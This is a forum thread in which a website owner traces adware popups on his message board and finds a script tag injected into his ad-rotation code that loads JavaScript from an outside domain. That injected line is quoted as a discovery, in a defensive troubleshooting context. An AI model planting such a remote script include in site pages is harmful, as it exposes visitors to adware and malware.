This is a bit off topic but I don't know where else to look for answers.
I run google ads on my website. I am the publisher. The ads are rotated using javascript. The code goes on each page and one of the ads in the rotation displays with each page load.
I have been running google ads on my main website and just recently added them to my message board. About a month later I started having trouble with window media player opening with some elephant video clip and the box to click to download the entire video clip. The message mentioned zango or zanga can't remember now. I think you would get a virus/spyware if you clicked to download. ptf_0002.exe I think was the executable.
Well I at first figured I had some spyware stuff on my computer. Then I noticed it was only on my message board. Then others on the board said they were getting the wm player poping up. So I agian took a closer look at my website and could find no code that might have been maliciously placed. Started paying closer attention. Noticed it only occured when a google ad was displayed. A 1 in 9 chance although the ad displayed varied so it wasn't popping up every time a google ad showed up. So less than 1 in 9 chance.
I was baffled. I have pulled the google ads from the banner rotation and have not gotten the popup since! Mentioned this to my wife and she said she THINKS that she has heard of google ads doing the same thing somewhere on the internet. So I did some searches and came up with nothing.
Has anyone heard of this?

Strange. Haven't heard of this before but if I find anything on it or anyone that knows what the cause might be I'll post again.
The contextual forum is a better place for this thread so I've moved it there.

The only way I can see that it might not have been google ads causing it is if I and the others that saw this over and over had an adware program on their computer and the program was triggered by one of the three text ads that showed up when it was triggered.
I am totally left wondering with no answer to this very strange happening. (Super curious)

There are some really sneaky or sophisticated programs out there that cause issues that are difficult to diagnose. I have yet to find an explanation for a strange SPAM issue I have been seeing for over a year that I now suspect has some link to Yahoo Messenger.
I wonder if there is any way a particular ad url could have coding in it that can do that. I don't know how but I am not a programmer.
Some kind of spyware triggered by particular words sounds like a possibility too. The more data you can collect the more likely you can find the cause.
Do some people see the problem consistently while others never do? Does it affect all browser programs or only one? Does it matter what operating system or version of media player they use?
You might be able to determine if a particular ad triggered this by putting the Google ads back on the page and noting which ads appear when the issue occurs.
It is quite possible you get a different mix of ads each time so by reloading the page over and over or having others who are affected note the ads when the issue is triggered you can determine which one causes it.
Alternatively, you could use the Adsense system to block each ad from appearing on your page. By blocking and unblocking each ad you can determine which one causes the issue.
If you determine it is one offending ad, you can leave it blocked so you can run Adsense on your page again. If more than one ad causes the problem look for a common word in each ad.
If it comes down to a particular ad causing the problem I would notify Google and give them details as it could be something about that ad or some kind of strange scumware.

Thanks. I don't know what operating system the others have but I do know that it has stopped appearing for everybody except one. And I think it is/was a cache issue with him or possible just his computer being infected.
Some people have totally ignored my request for info about the popup so I think they might not be getting it or maybe they are infected with adware all the time so don't know any different.
I have been combing the internet and can't find anyone with this problem. I can't even find reference to the particular elephant grabing the guys nuts that is shown on the popup!
I can handle it on my computer with firewalls and such but I really want to get to the bottom of this because the people on my website aren't all that computer literate. Heck I have had to help some of them register their user names and other simple things.

Added google ads back and took about 1 second to get the popup that has been gone for a couple of days to reshow.
Here is the popup screen capture.

It scales on my computer so you can't read it but the picture is detailed enough to read if you open it up with a paint program.

Found the problem.
Someone added some code to my google ad script.
<scrpt language="JavaScript" src="http://domainstat.net/stat.php"></scrpt>
Been resecuring my server so haven't done any investigation into how the above code go there. Wasn't on my computers copy of the code.
